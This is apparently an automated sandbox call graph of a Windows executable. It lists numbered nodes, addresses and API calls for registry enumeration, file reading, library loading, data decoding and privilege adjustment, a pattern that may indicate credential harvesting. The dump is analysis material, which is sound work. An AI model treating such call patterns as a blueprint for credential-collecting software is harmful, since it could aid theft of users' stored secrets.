API calls 7374->7375 7376 413afc 7375->7376 7376->7373 7377 413b05 _mbscpy 7376->7377 7377->7373 7379 413665 7378->7379 7379->7368 7381 414060 7380->7381 7382 4137db memset 7381->7382 7383 413646 strlen 7382->7383 7384 413809 strlen 7383->7384 7385 413a51 7384->7385 7386 413822 7384->7386 7385->7369 7386->7385 7387 41382a memset memset memset memset 7386->7387 7388 4138a4 7387->7388 7424 40c929 7388->7424 7390 4138b2 7431 40c9c7 7390->7431 7392 4138c1 memcpy 7393 4138dd 7392->7393 7394 40c929 3 API calls 7393->7394 7395 4138ee 7394->7395 7396 40c9c7 5 API calls 7395->7396 7397 4138fa memcpy memcpy 7396->7397 7398 413928 7397->7398 7399 40c929 3 API calls 7398->7399 7400 413939 7399->7400 7401 40c9c7 5 API calls 7400->7401 7403 413945 7401->7403 7402 4139e2 _mbscpy 7404 413a00 7402->7404 7403->7402 7403->7403 7405 40c929 3 API calls 7404->7405 7406 413a0e 7405->7406 7407 40c9c7 5 API calls 7406->7407 7408 413a1a memcpy memcpy 7407->7408 7408->7385 7410 413646 strlen 7409->7410 7411 413b81 strlen 7410->7411 7412 413b99 7411->7412 7423 413c28 7411->7423 7413 413ba1 memcpy memcpy 7412->7413 7412->7423 7414 413bcf 7413->7414 7415 40c929 3 API calls 7414->7415 7416 413be1 7415->7416 7417 40c9c7 5 API calls 7416->7417 7418 413bf0 memcpy 7417->7418 7419 413c0e 7418->7419 7420 40c929 3 API calls 7419->7420 7421 413c1f 7420->7421 7422 40c9c7 5 API calls 7421->7422 7422->7423 7423->7372 7425 40c940 7424->7425 7426 40c960 memcpy 7425->7426 7427 40c967 memcpy 7425->7427 7430 40c97e 7425->7430 7426->7390 7427->7430 7428 40c98d memcpy 7428->7430 7430->7426 7430->7428 7432 40c9e1 memset 7431->7432 7433 40ca07 memset 7431->7433 7438 40ca46 7432->7438 7435 40ca16 7433->7435 7437 40ca2c memcpy memset 7435->7437 7436 40c9f7 memset 7436->7435 7437->7392 7438->7436 7454 411d68 RegOpenKeyExA 7439->7454 7441 40d7b8 7442 40d7c3 memset 7441->7442 7443 40d92b 7441->7443 7445 40d7f1 7442->7445 7443->6753 7443->6754 7446 40d922 RegCloseKey 7445->7446 7448 40d80f RegQueryValueExA 7445->7448 7449 40d8f9 RegCloseKey 7445->7449 7451 40d85a memset 7445->7451 7453 40d88b _mbscpy _mbscpy 7445->7453 7455 411d68 RegOpenKeyExA 7445->7455 7467 411dee RegEnumKeyExA 7445->7467 7446->7443 7448->7449 7450 40d839 atoi 7448->7450 7449->7445 7450->7445 7450->7449 7456 40807d memcpy memcpy 7451->7456 7453->7445 7454->7441 7455->7445 7457 4080b0 7456->7457 7458 40c929 3 API calls 7457->7458 7459 4080bf 7458->7459 7460 40c9c7 5 API calls 7459->7460 7461 4080cb 7460->7461 7461->7461 7462 40810c memset 7461->7462 7465 408194 7461->7465 7464 408138 7462->7464 7463 40815f strlen 7463->7465 7466 40816b _mbscpy _mbscpy 7463->7466 7464->7463 7465->7445 7466->7465 7467->7445 7469 407dc4 7468->7469 7470 411d68 RegOpenKeyExA 7469->7470 7470->6760 7471->6766 7472->6766 7475 407e51 7473->7475 7474 407f77 RegCloseKey 7474->6766 7475->7474 7476 407e65 memset 7475->7476 7477 407e96 7476->7477 7478 404c9d 3 API calls 7477->7478 7481 407ede 7478->7481 7479 407f6f 7480 404ce0 FreeLibrary 7479->7480 7480->7474 7481->7479 7482 407f25 memcpy 7481->7482 7483 406958 2 API calls 7482->7483 7484 407f59 LocalFree 7483->7484 7484->7479 7486->6766 7487->6775 7488->6781 7489->6781 7491 407b01 7490->7491 7492 407bbf RegCloseKey 7490->7492 7493 404c9d 3 API calls 7491->7493 7492->6781 7495 407b12 7493->7495 7494 404ce0 FreeLibrary 7494->7492 7496 407b3e WideCharToMultiByte LocalFree 7495->7496 7502 407baa 7495->7502 7497 411d82 RegQueryValueExA 7496->7497 7498 407b87 7497->7498 7499 411d82 RegQueryValueExA 7498->7499 7500 407b9c 7499->7500 7501 406958 2 API calls 7500->7501 7501->7502 7502->7494 7503->6781 7504->6792 7522 4067ba CreateFileA 7505->7522 7507 410ad6 7508 410ae3 GetFileSize 7507->7508 7509 410b8e 7507->7509 7523 407a56 7508->7523 7509->6793 7511 410b07 7512 407a56 2 API calls 7511->7512 7513 410b1a 7512->7513 7514 406ed6 ReadFile 7513->7514 7515 410b31 7514->7515 7516 410b75 CloseHandle 7515->7516 7518 410b50 WideCharToMultiByte 7515->7518 7545 407a41 7516->7545 7526 4108fa 7518->7526 7520 407a41 ??3@YAXPAX 7520->7509 7522->7507 7524 407a6a ??2@YAPAXI 7523->7524 7525 407a5c ??3@YAXPAX 7523->7525 7524->7511 7525->7524 7527 410907 7526->7527 7528 404c9d 3 API calls 7527->7528 7529 41091d 7528->7529 7530 410925 memset 7529->7530 7531 410ab6 7529->7531 7548 407193 7530->7548 7532 404ce0 FreeLibrary 7531->7532 7534 410abe 7532->7534 7534->7516 7535 410958 7535->7531 7536 41096b memset 7535->7536 7537 407193 memcpy 7535->7537 7539 4109b8 MultiByteToWideChar 7535->7539 7540 4109e0 memset 7535->7540 7542 40720f 2 API calls 7535->7542 7543 410a51 LocalFree 7535->7543 7544 410a2f memcpy 7535->7544 7552 40720f 7536->7552 7537->7535 7539->7535 7541 4029d9 strlen 7540->7541 7541->7535 7542->7535 7543->7535 7544->7543 7546 407a55 7545->7546 7547 407a47 ??3@YAXPAX 7545->7547 7546->7520 7547->7546 7549 4071aa 7548->7549 7551 4071a6 7548->7551 7550 4071d4 memcpy 7549->7550 7549->7551 7550->7551 7551->7535 7553 407221 7552->7553 7556 407228 7552->7556 7553->7535 7554 407236 strchr 7554->7556 7555 407269 memcpy 7555->7556 7556->7553 7556->7554 7556->7555 7557->6798 7558->6807 7559->6807 7561 410eb7 7560->7561 7561->6807 7562->6807 7563->6817 7578 4067ba CreateFileA 7564->7578 7566 405af9 7567 405b02 GetFileSize 7566->7567 7568 405b53 7566->7568 7569 405b12 7567->7569 7570 405b4a CloseHandle 7567->7570 7568->6819 7571 407a56 2 API calls 7569->7571 7570->7568 7572 405b23 7571->7572 7573 406ed6 ReadFile 7572->7573 7574 405b32 7573->7574 7579 405865 memset 7574->7579 7577 407a41 ??3@YAXPAX 7577->7570 7578->7566 7580 407193 memcpy 7579->7580 7588 4058c3 7580->7588 7581 405ae1 7581->7577 7582 406958 2 API calls 7582->7588 7583 405902 strlen 7583->7588 7584 40593d memset memset 7584->7588 7585 4070e4 strlen strlen memcmp 7585->7588 7586 407193 memcpy 7586->7588 7588->7581 7588->7582 7588->7583 7588->7584 7588->7585 7588->7586 7589 406d5a strtoul 7588->7589 7589->7588 7591 40f9b6 7590->7591 7641 40fa34 7591->7641 7594 40fa27 7654 40733e free free 7594->7654 7596 40e6a8 strrchr 7596->6824 7599 40f9d1 7600 40fa11 7599->7600 7655 406d2b 7599->7655 7600->7594 7601 406958 2 API calls 7600->7601 7602 40fa26 7601->7602 7602->7594 7686 410c4c memset 7603->7686 7606 406521 memset 7608 406958 2 API calls 7606->7608 7607 4066d9 7638 410d6f 7607->7638 7609 40654d 7608->7609 7610 40656e memset memset memset strlen strlen 7609->7610 7635 4066c1 7609->7635 7611 4065d5 7610->7611 7612 4065e4 strlen strlen 7610->7612 7614 406b4b 4 API calls 7611->7614 7616 40661d strlen strlen 7612->7616 7617 40660e 7612->7617 7613 410d6f 2 API calls 7613->7607 7614->7612 7620 406647 7616->7620 7621 406656 7616->7621 7618 406b4b 4 API calls 7617->7618 7618->7616 7622 406b4b 4 API calls 7620->7622 7696 4069d3 GetFileAttributesA 7621->7696 7622->7621 7624 40666d 7625 406681 7624->7625 7626 406672 7624->7626 7716 4069d3 GetFileAttributesA 7625->7716 7697 4062db 7626->7697 7629 40668d 7630 4066a1 7629->7630 7631 406692 7629->7631 7717 4069d3 GetFileAttributesA 7630->7717 7632 4062db 21 API calls 7631->7632 7632->7630 7634 4066ad 7634->7635 7636 4066b2 7634->7636 7635->7613 7637 4062db 21 API calls 7636->7637 7637->7635 7639 410d74 SetCurrentDirectoryA FreeLibrary 7638->7639 7640 40e71c 7638->7640 7639->7640 7640->6829 7642 40fa48 7641->7642 7660 40fc4f memset memset 7642->7660 7644 40fa4e 7645 40fb5b 7644->7645 7647 40fa66 memset 7644->7647 7649 40fa8a strlen strlen 7644->7649 7650 406b4b strlen _mbscat _mbscpy _mbscat 7644->7650 7651 40faec strlen strlen 7644->7651 7652 4069d3 GetFileAttributesA 7644->7652 7653 407364 7 API calls 7644->7653 7673 40733e free free 7645->7673 7647->7644 7648 40f9bc 7648->7594 7648->7599 7649->7644 7650->7644 7651->7644 7652->7644 7653->7644 7654->7596 7685 4067ba CreateFileA 7655->7685 7657 406d38 7658 406d55 CompareFileTime 7657->7658 7659 406d3f GetFileTime CloseHandle 7657->7659 7658->7599 7659->7658 7661 41223f 10 API calls 7660->7661 7662 40fc9e 7661->7662 7663 40680e 2 API calls 7662->7663 7664 40fca5 _mbscat 7663->7664 7665 41223f 10 API calls 7664->7665 7666 40fcc6 7665->7666 7667 40680e 2 API calls 7666->7667 7668 40fccd _mbscat 7667->7668 7674 40fb6a 7668->7674 7671 40fb6a 22 API calls 7672 40fcfa 7671->7672 7672->7644 7673->7648 7675 40783b 9 API calls 7674->7675 7684 40fb9e 7675->7684 7676 40fc3e 7677 407930 FindClose 7676->7677 7678 40fc49 7677->7678 7678->7671 7679 407364 7 API calls 7679->7684 7680 40783b 9 API calls 7680->7684 7681 407898 9 API calls 7681->7684 7682 407800 strcmp strcmp 7682->7684 7683 407930 FindClose 7683->7684 7684->7676 7684->7679 7684->7680 7684->7681 7684->7682 7684->7683 7685->7657 7718 405ec5 memset memset 7686->7718 7689 406519 7689->7606 7689->7607 7690 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7691 410cf3 LoadLibraryExA 7690->7691 7692 410cdc 7690->7692 7691->7689 7695 410d17 6 API calls 7691->7695 7693 406b4b 4 API calls 7692->7693 7693->7691 7695->7689 7696->7624 7698 4062e8 7697->7698 7750 4067ba CreateFileA 7698->7750 7700 4062f3 7701 406302 GetFileSize 7700->7701 7702 4064f4 7700->7702 7703 406316 ??2@YAPAXI 7701->7703 7704 4064eb CloseHandle 7701->7704 7702->7625 7705 406ed6 ReadFile 7703->7705 7704->7702 7706 40632c memset memset memset 7705->7706 7751 4060c4 7706->7751 7708 4064e2 ??3@YAXPAX 7708->7704 7709 4063ad strcmp 7711 406395 7709->7711 7710 4060c4 memcpy 7710->7711 7711->7708 7711->7709 7711->7710 7712 40644e _mbscpy 7711->7712 7713 40645d _mbscpy 7711->7713 7715 4064a7 strcmp 7711->7715 7712->7711 7755 40623f 7713->7755 7715->7711 7716->7629 7717->7634 7740 411d68 RegOpenKeyExA 7718->7740 7720 405f1c 7721 406072 _mbscpy 7720->7721 7722 405f27 memset 7720->7722 7724 406085 ExpandEnvironmentStringsA 7721->7724 7725 4060b0 7721->7725 7741 411dee RegEnumKeyExA 7722->7741 7726 405e4a 8 API calls 7724->7726 7725->7689 7725->7690 7727 406098 7726->7727 7727->7725 7731 4060a2 GetCurrentDirectoryA 7727->7731 7728 406069 RegCloseKey 7728->7721 7729 405f5a _mbsnbicmp 7730 405f78 memset memset _snprintf 7729->7730 7736 405f52 7729->7736 7734 411dae 3 API calls 7730->7734 7732 405e4a 8 API calls 7731->7732 7732->7725 7735 405fd9 _mbsrchr 7734->7735 7735->7736 7736->7728 7736->7729 7738 406004 _mbsicmp 7736->7738 7742 405e4a memset strlen strlen 7736->7742 7748 411dee RegEnumKeyExA 7736->7748 7738->7736 7739 40601d _mbscpy _mbscpy 7738->7739 7739->7736 7740->7720 7741->7736 7743 405e91 7742->7743 7744 405ea0 7742->7744 7745 406b4b 4 API calls 7743->7745 7749 4069d3 GetFileAttributesA 7744->7749 7745->7744 7747 405eb7 7747->7736 7748->7736 7749->7747 7750->7700 7752 4060db 7751->7752 7754 4060d7 7751->7754 7753 406106 memcpy 7752->7753 7752->7754 7753->7754 7754->7711 7756 40624c 7755->7756 7757 406259 _mbscpy 7756->7757 7763 406143 7757->7763 7760 406143 3 API calls 7761 406290 _mbscpy _mbscpy _mbscpy 7760->7761 7762 4062d6 7761->7762 7762->7711 7764 406163 7763->7764 7765 406174 7763->7765 7766 406180 memset 7764->7766 7767 40616c 7764->7767 7765->7760 7769 4029d9 strlen 7766->7769 7768 4029d9 strlen 7767->7768 7768->7765 7770 4061a7 7769->7770 7770->7765 7771 406214 memcpy 7770->7771 7771->7765 7773 4085c6 7772->7773 7801 40733e free free 7773->7801 7775 408602 7802 40821a 7775->7802 7777 4085d3 7777->7775 7825 407407 7777->7825 7781 4086db 7789 40733e free free 7781->7789 7782 4086d3 7783 404d18 7 API calls 7782->7783 7783->7781 7784 408649 MultiByteToWideChar _wcslwr 7830 408490 7784->7830 7787 408610 7787->7781 7787->7782 7787->7784 7788 408490 17 API calls 7787->7788 7788->7787 7789->6836 7791 4081b7 7790->7791 7792 4081ac FreeLibrary 7790->7792 7793 407491 free 7791->7793 7792->7791 7794 4081c0 7793->7794 7868 40733e free free 7794->7868 7796 4081c8 7869 40733e free free 7796->7869 7798 4081d0 7870 40733e free free 7798->7870 7800 4081d8 7801->7777 7844 40733e free free 7802->7844 7804 408233 7845 411d68 RegOpenKeyExA 7804->7845 7806 408246 7807 408251 7806->7807 7808 408356 7806->7808 7809 40746b 4 API calls 7807->7809 7822 404d18 7808->7822 7810 408269 memset 7809->7810 7846 4074aa 7810->7846 7813 40834c RegCloseKey 7813->7808 7814 4082bd 7815 4082c6 _strupr 7814->7815 7816 407364 7 API calls 7815->7816 7817 4082e4 7816->7817 7818 407364 7 API calls 7817->7818 7819 4082f8 memset 7818->7819 7820 4074aa 7819->7820 7821 408327 RegEnumValueA 7820->7821 7821->7813 7821->7815 7823 404d79 7822->7823 7824 404d1d 7 API calls 7822->7824 7823->7787 7824->7823 7848 407428 7825->7848 7828 407424 7828->7777 7829 407364 7 API calls 7829->7828 7831 404d18 7 API calls 7830->7831 7832 4084a6 7831->7832 7833 4085a8 wcslen 7832->7833 7834 4084cb wcslen 7832->7834 7833->7787 7835 404d18 7 API calls 7834->7835 7837 4084e4 7835->7837 7836 40859e 7839 404d18 7 API calls 7836->7839 7837->7836 7838 404d18 7 API calls 7837->7838 7840 40851d 7838->7840 7839->7833 7840->7836 7841 40853a memset 7840->7841 7842 408560 7841->7842 7852 4083d0 7842->7852 7844->7804 7845->7806 7847 4074b0 RegEnumValueA 7846->7847 7847->7813 7847->7814 7849 40742e 7848->7849 7850 407437 strcmp 7849->7850 7851 407413 7849->7851 7850->7849 7850->7851 7851->7828 7851->7829 7853 407428 strcmp 7852->7853 7854 4083e3 7853->7854 7855 40848a 7854->7855 7856 40841f wcslen 7854->7856 7855->7836 7857 404c9d 3 API calls 7856->7857 7860 408447 7857->7860 7858 408482 7859 404ce0 FreeLibrary 7858->7859 7859->7855 7860->7858 7861 408479 LocalFree 7860->7861 7863 40835f 7860->7863 7861->7858 7864 4083c9 7863->7864 7867 408377 7863->7867 7864->7861 7865 408382 wcslen 7865->7864 7866 40839b wcslen 7865->7866 7866->7867 7867->7864 7867->7865 7868->7796 7869->7798 7870->7800 7872 40e506 7871->7872 7873 40e515 7871->7873 7874 406b4b 4 API calls 7872->7874 7879 4069d3 GetFileAttributesA 7873->7879 7874->7873 7876 40e52c 7877 40e540 7876->7877 7880 40e293 7876->7880 7877->6841 7877->6843 7879->7876 7895 4067ba CreateFileA 7880->7895 7882 40e2a7 7883 40e2b4 GetFileSize 7882->7883 7884 40e4ac 7882->7884 7885 40e4a3 CloseHandle 7883->7885 7886 40e2cc ??2@YAPAXI memset ReadFile 7883->7886 7884->7877 7885->7884 7893 40e314 7886->7893 7887 407193 memcpy 7887->7893 7888 40e49c ??3@YAXPAX 7888->7885 7889 407139 strlen strlen _memicmp 7889->7893 7890 40e39b memcpy memcpy 7891 407139 3 API calls 7890->7891 7891->7893 7892 406958 2 API calls 7892->7893 7893->7887 7893->7888 7893->7889 7893->7890 7893->7892 7894 4029d9 strlen 7893->7894 7894->7893 7895->7882 7897 414060 7896->7897 7898 40dd72 memset strlen strlen 7897->7898 7899 40ddbe 7898->7899 7900 40ddad 7898->7900 7910 4069d3 GetFileAttributesA 7899->7910 7901 406b4b 4 API calls 7900->7901 7901->7899 7903 40ddd4 7904 40dddd 7 API calls 7903->7904 7905 40dfcf 7903->7905 7904->7905 7908 40dea4 7904->7908 7905->6851 7907 406958 strlen memcpy 7907->7908 7908->7905 7908->7907 7909 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7908->7909 7911 40dcf2 7908->7911 7909->7905 7909->7908 7910->7903 7912 40dd0d 7911->7912 7913 40dd54 7912->7913 7914 40dd1f strtoul 7912->7914 7913->7908 7914->7912 7914->7913 7915->6882 7975 406d91 memset 7916->7975 7918 412d78 ??2@YAPAXI 7919 412d87 7918->7919 7920 412d90 ??2@YAPAXI 7919->7920 7921 412da2 7920->7921 7922 412dab ??2@YAPAXI 7921->7922 7923 412dc2 ??2@YAPAXI 7922->7923 7925 412de6 ??2@YAPAXI 7923->7925 7927 40ebd8 7925->7927 7928 412f02 7927->7928 7976 4067ba CreateFileA 7928->7976 7930 412f0f 7931 412f44 7930->7931 7932 412f17 GetFileSize 7930->7932 7931->6886 7977 412ed6 7932->7977 7934 412f28 7935 406ed6 ReadFile 7934->7935 7936 412f34 CloseHandle 7935->7936 7936->7931 7980 4075ad MultiByteToWideChar 7937->7980 7940 412fa1 7942 407491 free 7940->7942 7941 412ed6 2 API calls 7943 412f85 memcpy 7941->7943 7944 40ec08 7942->7944 7943->7940 7946 40d1a5 7944->7946 7947 413095 7946->7947 7995 40733e free free 7947->7995 7949 4130c7 7996 40733e free free 7949->7996 7951 4133aa 7951->6887 7952 40746b 4 API calls 7954 4130d2 7952->7954 7953 412fb0 19 API calls 7953->7954 7954->7951 7954->7952 7954->7953 7955 41322b memcpy 7954->7955 7997 412768 7954->7997 7955->7954 7958 412e65 7957->7958 7959 412e5a ??3@YAXPAX 7957->7959 7960 412e7c 7958->7960 7961 407491 free 7958->7961 7959->7958 7962 407491 free 7960->7962 7964 412e92 7960->7964 7965 412e75 ??3@YAXPAX 7961->7965 7966 412e8b ??3@YAXPAX 7962->7966 7963 412ea8 7968 412ebe 7963->7968 8006 40733e free free 7963->8006 7964->7963 7967 407491 free 7964->7967 7965->7960 7966->7964 7969 412ea1 ??3@YAXPAX 7967->7969 7971 412ed4 7968->7971 8007 40733e free free 7968->8007 7969->7963 7971->6876 7972 412eb7 ??3@YAXPAX 7972->7968 7974 412ecd ??3@YAXPAX 7974->7971 7975->7918 7976->7930 7978 412ee0 ??3@YAXPAX 7977->7978 7979 412eeb ??2@YAPAXI 7977->7979 7978->7979 7979->7934 7981 407634 7980->7981 7982 4075d7 7980->7982 7981->7940 7981->7941 7983 40746b 4 API calls 7982->7983 7984 4075f5 MultiByteToWideChar 7983->7984 7986 407614 7984->7986 7987 40762a 7984->7987 7990 407564 WideCharToMultiByte 7986->7990 7988 407491 free 7987->7988 7988->7981 7991 4075a4 7990->7991 7992 407586 7990->7992 7991->7987 7993 40746b 4 API calls 7992->7993 7994 407590 WideCharToMultiByte 7993->7994 7994->7991 7995->7949 7996->7954 7998 412d44 7997->7998 8001 412b5d 7997->8001 7998->7954 7999 412b83 strlen strncmp 7999->8001 8000 412cc0 strlen strncmp 8000->8001 8001->7998 8001->7999 8001->8000 8002 412c93 memcpy 8001->8002 8003 412c0b memcpy atoi WideCharToMultiByte 8001->8003 8005 406d5a strtoul 8002->8005 8003->8001 8005->8001 8006->7972 8007->7974 8008->6899 8009->6919 8020 40f94e 8010->8020 8013 40f946 8013->6919 8014 40f8c8 memcmp 8014->8013 8015 40f8df 8014->8015 8015->8013 8016 40f94e 3 API calls 8015->8016 8019 40f8f5 8016->8019 8017 40f94e 3 API calls 8017->8019 8019->8013 8019->8017 8025 40f689 8019->8025 8021 40f960 SetFilePointer 8020->8021 8022 40f96e memset 8020->8022 8021->8022 8023 406ed6 ReadFile 8022->8023 8024 40f8c4 8023->8024 8024->8013 8024->8014 8026 40f696 8025->8026 8027 40f806 8026->8027 8028 40f94e 3 API calls 8026->8028 8027->8019 8029 40f6ca 8028->8029 8029->8027 8030 40f94e 3 API calls 8029->8030 8031 40f6e7 8030->8031 8032 40f94e 3 API calls 8031->8032 8035 40f779 8031->8035 8034 40f710 _strcmpi 8032->8034 8034->8035 8036 40f734 _strcmpi 8034->8036 8035->8027 8037 40f789 _strcmpi 8035->8037 8055 40f5c1 8035->8055 8036->8035 8038 40f74b _strcmpi 8036->8038 8040 40f80b 8037->8040 8041 40f79d _strcmpi 8037->8041 8038->8035 8039 40f762 _strcmpi 8038->8039 8039->8035 8042 40f5c1 2 API calls 8040->8042 8041->8040 8043 40f7b1 _strcmpi 8041->8043 8045 40f822 8042->8045 8043->8040 8044 40f7c5 _strcmpi 8043->8044 8044->8040 8046 40f7d9 _strcmpi 8044->8046 8045->8027 8047 40f826 _mbscpy 8045->8047 8046->8035 8046->8040 8048 40f84e 8047->8048 8048->8027 8049 40f5c1 2 API calls 8048->8049 8050 40f83a _strcmpi 8048->8050 8049->8048 8050->8048 8051 40f869 8050->8051 8052 40f5c1 2 API calls 8051->8052 8053 40f87f 8052->8053 8053->8027 8054 40f883 _mbscpy 8053->8054 8054->8027 8056 40f649 8055->8056 8057 40f5d8 8055->8057 8056->8035 8057->8056 8058 40f61e memcpy 8057->8058 8058->8056 8059 40f65a 8058->8059 8059->8056 8060 40f666 _ultoa 8059->8060 8060->8056 8061 41208b FindResourceA 8062 4120a4 SizeofResource 8061->8062 8065 4120ce 8061->8065 8063 4120b5 LoadResource 8062->8063 8062->8065 8064 4120c3 LockResource 8063->8064 8063->8065 8064->8065 5991 412111 EnumResourceNamesA 6020 413e10 6039 414000 6020->6039 6022 413e1c GetModuleHandleA 6023 413e2e __set_app_type __p__fmode __p__commode 6022->6023 6025 413ec0 6023->6025 6026 413ed4 6025->6026 6027 413ec8 __setusermatherr 6025->6027 6040 413fe8 _controlfp 6026->6040 6027->6026 6029 413ed9 _initterm __getmainargs _initterm 6030 413f30 GetStartupInfoA 6029->6030 6032 413f64 GetModuleHandleA 6030->6032 6041 40c66a 6032->6041 6036 413f95 _cexit 6038 413fca 6036->6038 6037 413f8e exit 6037->6036 6039->6022 6040->6029 6094 404d7a LoadLibraryA 6041->6094 6043 40c682 6044 40c686 6043->6044 6102 412192 6043->6102 6044->6036 6044->6037 6049 40c6a4 FreeLibrary 6050 40c6ad EnumResourceTypesA 6049->6050 6051 40c6d8 MessageBoxA 6050->6051 6052 40c6f0 6050->6052 6051->6044 6123 40c427 ??2@YAPAXI 6052->6123 6059 40c73a 6156 409167 memset 6059->6156 6060 40c74e 6161 40902b memset 6060->6161 6065 4077af 2 API calls 6067 40c762 6065->6067 6066 40c8b3 ??3@YAXPAX 6068 40c8d7 6066->6068 6069 40c8cb DeleteObject 6066->6069 6070 40c766 RegDeleteKeyA 6067->6070 6071 40c77b 6067->6071 6182 40733e free free 6068->6182 6069->6068 6070->6066 6071->6066 6074 40c7d5 CoInitialize 6071->6074 6166 40c5a4 6071->6166 6073 40c8e9 6183 407a7a 6073->6183 6181 40c3af RegisterClassA CreateWindowExA 6074->6181 6081 40c7e7 ShowWindow UpdateWindow LoadAcceleratorsA PostMessageA GetMessageA 6087 40c848 6081->6087 6088 40c8ad CoUninitialize 6081->6088 6082 40c7d3 6082->6074 6083 40c7a4 ??3@YAXPAX 6083->6068 6086 40c7c1 DeleteObject 6083->6086 6086->6068 6089 40c84e TranslateAccelerator 6087->6089 6091 40c871 IsDialogMessage 6087->6091 6092 40c87c IsDialogMessage 6087->6092 6088->6066 6089->6087 6090 40c8a0 GetMessageA 6089->6090 6090->6088 6090->6089 6091->6090 6091->6092 6092->6090 6093 40c88c TranslateMessage DispatchMessageA 6092->6093 6093->6090 6095 404da5 GetProcAddress 6094->6095 6096 404dcd 6094->6096 6097 404db5 6095->6097 6098 404dbe FreeLibrary 6095->6098 6100 404df4 6096->6100 6101 404ddd MessageBoxA 6096->6101 6097->6098 6098->6096 6099 404dc9 6098->6099 6099->6096 6100->6043 6101->6043 6103 40c692 6102->6103 6104 41219b LoadLibraryA 6102->6104 6106 410de1 GetCurrentProcess 6103->6106 6104->6103 6105 4121af GetProcAddress 6104->6105 6105->6103 6187 410daa 6106->6187 6109 410e02 GetLastError 6112 40c69f 6109->6112 6110 410e0a 6193 410d8a 6110->6193 6112->6049 6112->6050 6113 410e11 6114 410e36 6113->6114 6115 410e1d GetProcAddress 6113->6115 6117 410d8a LoadLibraryA 6114->6117 6115->6114 6116 410e2a LookupPrivilegeValueA 6115->6116 6116->6114 6118 410e4f 6117->6118 6119 410e53 GetProcAddress 6118->6119 6120 410e6d CloseHandle 6118->6120 6119->6120 6121 410e60 AdjustTokenPrivileges 6119->6121 6120->6112 6121->6120 6124 40c453 6123->6124 6125 40c461 ??2@YAPAXI 6124->6125 6126 40c478 6125->6126 6128 40c47d 6125->6128 6204 4092cc 6126->6204 6129 40c4b2 DeleteObject 6128->6129 6130 40c4bf 6128->6130 6129->6130 6196 406ae0 6130->6196 6132 40c4c4 6199 401000 6132->6199 6136 40c508 6137 40763d 6136->6137 6216 40733e free free 6137->6216 6141 40746b malloc memcpy free free 6144 407678 6141->6144 6142 407758 6150 407783 6142->6150 6240 40746b 6142->6240 6144->6141 6144->6142 6145 4076fc free 6144->6145 6144->6150 6217 407364 6144->6217 6232 406982 6144->6232 6145->6144 6149 407364 7 API calls 6149->6150 6229 407491 6150->6229 6151 4077af 6154 4077f5 6151->6154 6155 4077b7 6151->6155 6152 4077c7 _strcmpi 6152->6155 6153 4077de _strnicmp 6153->6155 6154->6059 6154->6060 6155->6152 6155->6153 6155->6154 6245 409141 6156->6245 6158 409196 6250 409068 6158->6250 6162 409141 3 API calls 6161->6162 6163 40905a 6162->6163 6274 408fbc 6163->6274 6280 403cb2 6166->6280 6170 40c5f1 6174 40c665 6170->6174 6283 40bbf0 memset GetModuleFileNameA strrchr 6170->6283 6171 40c5f6 6326 40c50e _strcmpi 6171->6326 6174->6082 6174->6083 6177 40c610 6305 40a8f2 6177->6305 6181->6081 6182->6073 6184 407a80 free 6183->6184 6185 407a87 6183->6185 6184->6185 6186 40733e free free 6185->6186 6186->6044 6188 410d8a LoadLibraryA 6187->6188 6189 410db5 6188->6189 6190 410db9 GetProcAddress 6189->6190 6191 410dda 6189->6191 6190->6191 6192 410dca 6190->6192 6191->6109 6191->6110 6192->6191 6194 410da6 6193->6194 6195 410d8f LoadLibraryA 6193->6195 6194->6113 6195->6113 6214 406a19 memset _mbscpy 6196->6214 6198 406af7 CreateFontIndirectA 6198->6132 6200 40102c 6199->6200 6201 401030 LoadIconA 6200->6201 6202 40100d strncat 6200->6202 6203 402c8f _mbscpy 6201->6203 6202->6200 6203->6136 6215 406d91 memset 6204->6215 6206 4092df ??2@YAPAXI 6207 4092f3 ??2@YAPAXI 6206->6207 6209 409314 ??2@YAPAXI 6207->6209 6211 409335 ??2@YAPAXI 6209->6211 6213 409356 6211->6213 6213->6128 6214->6198 6215->6206 6216->6144 6218 407372 strlen 6217->6218 6219 40737e 6217->6219 6218->6219 6220 407396 free 6219->6220 6221 40739f 6219->6221 6222 4073a9 6220->6222 6223 406982 3 API calls 6221->6223 6224 4073c2 6222->6224 6225 4073b9 free 6222->6225 6223->6222 6227 406982 3 API calls 6224->6227 6226 4073ce memcpy 6225->6226 6226->6144 6228 4073cd 6227->6228 6228->6226 6230 4074a1 6229->6230 6231 407497 free 6229->6231 6230->6151 6231->6230 6233 406989 malloc 6232->6233 6234 4069cf 6232->6234 6236 4069c5 6233->6236 6237 4069aa 6233->6237 6234->6144 6236->6144 6238 4069be free 6237->6238 6239 4069ae memcpy 6237->6239 6238->6236 6239->6238 6241 407482 6240->6241 6242 407476 free 6240->6242 6244 406982 3 API calls 6241->6244 6243 40748d 6242->6243 6243->6149 6244->6243 6263 4069e8 GetModuleFileNameA 6245->6263 6247 409147 strrchr 6248 409156 6247->6248 6249 409159 _mbscat 6247->6249 6248->6249 6249->6158 6264 414060 6250->6264 6255 408ca1 3 API calls 6256 4090b0 6255->6256 6257 408ca1 3 API calls 6256->6257 6258 4090bb EnumResourceNamesA EnumResourceNamesA _mbscpy memset 6257->6258 6259 409107 LoadStringA 6258->6259 6260 40911d 6259->6260 6260->6259 6262 409135 6260->6262 6271 408d0f _itoa 6260->6271 6262->6066 6263->6247 6265 409075 _mbscpy _mbscpy 6264->6265 6266 408ca1 6265->6266 6267 414060 6266->6267 6268 408cae memset GetPrivateProfileStringA 6267->6268 6269 408cf9 WritePrivateProfileStringA 6268->6269 6270 408d09 6268->6270 6269->6270 6270->6255 6272 408ca1 3 API calls 6271->6272 6273 408d41 6272->6273 6273->6260 6279 4069d3 GetFileAttributesA 6274->6279 6276 408fc5 6277 40902a 6276->6277 6278 408fca _mbscpy _mbscpy GetPrivateProfileIntA GetPrivateProfileStringA 6276->6278 6277->6065 6278->6277 6279->6276 6344 40955a 6280->6344 6284 40bc40 6283->6284 6285 40bc43 _mbscat _mbscpy _mbscpy 6283->6285 6284->6285 6383 4039a8 6285->6383 6287 40bcd4 6290 40bcf9 6287->6290 6398 402d81 6287->6398 6289 40bcc4 GetWindowPlacement 6289->6287 6391 40946f 6290->6391 6294 40b2f5 6295 40b370 6294->6295 6299 40b325 6294->6299 6556 40671b LoadCursorA SetCursor 6295->6556 6297 40b375 6300 4077af 2 API calls 6297->6300 6298 40b32c _mbsicmp 6298->6299 6299->6295 